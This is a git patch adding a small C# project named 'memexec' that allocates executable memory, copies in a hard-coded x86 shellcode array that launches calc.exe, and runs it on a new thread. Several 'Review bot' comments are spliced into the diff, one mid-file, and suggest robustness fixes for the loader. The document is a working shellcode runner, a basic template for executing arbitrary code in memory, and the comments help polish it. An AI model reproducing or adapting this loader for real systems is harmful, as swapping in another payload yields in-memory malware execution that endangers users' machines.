From dc5b3be9a7d36e84bfa61907c170ff5772b95328 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sivert=20V=2E=20S=C3=A6ther?=
Date: Wed, 11 Dec 2024 20:17:51 +0100
Subject: [PATCH] batman
---
.gitignore | 2 ++
Program.cs | 16 ++++++++++++++++
Shells.cs | 7 +++++++
Win.cs | 15 +++++++++++++++
memexec.csproj | 10 ++++++++++
memexec.sln | 22 ++++++++++++++++++++++
6 files changed, 72 insertions(+)
create mode 100644 .gitignore
create mode 100644 Program.cs
create mode 100644 Shells.cs
create mode 100644 Win.cs
create mode 100644 memexec.csproj
create mode 100644 memexec.sln
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..c6e49ef
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+obj/
+bin/
diff --git a/Program.cs b/Program.cs
new file mode 100644
index 0000000..ad5a779
--- /dev/null
+++ b/Program.cs
@@ -0,0 +1,16 @@
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using memexec;
+
+Trace.Listeners.Add(new TextWriterTraceListener(Console.Out));
+
+Debug.WriteLine("Prepping shellcode");
+Byte[] buf = Shells.Calc;
+IntPtr addr = Win.VirtualAlloc(0, (uint)buf.Length, 0x3000, 0x40);
+Marshal.Copy(buf, 0, addr, buf.Length);
+IntPtr handle = Win.CreateThread(0, 0, addr, 0, 0, 0);
+Debug.WriteLine("Execing shellcode");
+if (Win.WaitForSingleObject(handle, 0xFFFFFFFF) != 0) {
+ Debug.WriteLine("Unable to join thread!");
+}
diff --git a/Shells.cs b/Shells.cs
new file mode 100644
index 0000000..13d09b6
--- /dev/null
+++ b/Shells.cs
@@ -0,0 +1,7 @@
+
+namespace memexec;
+
+public class Shells
+{
+ public static Byte[] Calc = [ 0x31, 0xc9, 0x51, 0x68, 0x2e, 0x65, 0x78, 0x65, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x89, 0xe0, 0x41, 0x51, 0x50, 0xbb, 0xfd, 0xe5, 0xf0, 0x76, 0xff, 0xd3, 0x31, 0xc0, 0x50, 0xb8, 0x4f, 0x21, 0xed, 0x76, 0xff, 0xe0 ];
+}
diff --git a/Win.cs b/Win.cs
new file mode 100644
index 0000000..9c6a80a
--- /dev/null
+++ b/Win.cs
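Review bot: In Program.cs the results of `Win.VirtualAlloc` and `Win.CreateThread` are used without a zero check, so a failed allocation reaches `Marshal.Copy` with a null destination and a failed thread creation is only noticed indirectly through the wait result. Add `if (addr == IntPtr.Zero) throw new InvalidOperationException("VirtualAlloc failed");` and the same test for `handle`. The literals `0x3000` and `0x40` should become named constants (MEM_COMMIT | MEM_RESERVE and PAGE_EXECUTE_READWRITE) with a comment stating that the region is both writable and executable and that the copied bytes are then run on a new thread; that allocate-copy-thread sequence is what endpoint tooling keys on, and a reader should not have to decode it from hex. All status output goes through `Debug.WriteLine`, which is compiled out of Release builds, so "Unable to join thread!" never appears there; `Console.Error.WriteLine` would keep it.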
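Review bot: `Calc` in Shells.cs is an opaque byte array with no comment on its origin, target architecture or effect, so it cannot be audited from the source; the ASCII bytes spell "calc" and ".exe", and the rest is undocumented. Add a header comment that records where the bytes came from, which platform they were assembled for and what they are expected to do, so a reviewer can compare the blob against a known reference. The field is also `public static` without `readonly`, so any code in the process can replace the array before it is used; `public static readonly byte[] Calc` on a `static class` stops the reassignment.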
@@ -0,0 +1,15 @@
+using System.Runtime.InteropServices;
+
+namespace memexec;
+
+public class Win
+{
+ [DllImport("kernel32")]
+ public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+
+ [DllImport("kernel32.dll", SetLastError=true)]
+ public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
+
+ [DllImport("kernel32", CharSet=CharSet.Ansi)]
+ public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+}
diff --git a/memexec.csproj b/memexec.csproj
new file mode 100644
index 0000000..fd4bd08
--- /dev/null
+++ b/memexec.csproj
@@ -0,0 +1,10 @@
+
+
+
+ Exe
+ net9.0
+ enable
+ enable
+
+
+
diff --git a/memexec.sln b/memexec.sln
new file mode 100644
index 0000000..0b82b11
--- /dev/null
+++ b/memexec.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.0.31903.59
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "memexec", "memexec.csproj", "{4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {4DE2DA8B-145E-41A8-952E-3EBE9E78BDEE}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+EndGlobal
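Review bot: The three `DllImport` declarations in Win.cs disagree with each other and with the native signatures. Only `WaitForSingleObject` sets `SetLastError=true`, so `Marshal.GetLastWin32Error()` is not reliable after a failed `VirtualAlloc` or `CreateThread`, and `CharSet=CharSet.Ansi` on `CreateThread` has no effect because no parameter is a string. `dwSize` and `dwStackSize` are SIZE_T in the Win32 headers, i.e. pointer-sized, so `UIntPtr` matches them where `uint` does not. I would declare all three as `[DllImport("kernel32.dll", SetLastError = true)]`, make the class `internal static`, and add `[DefaultDllImportSearchPaths(DllImportSearchPath.System32)]` so the library is resolved only from the system directory.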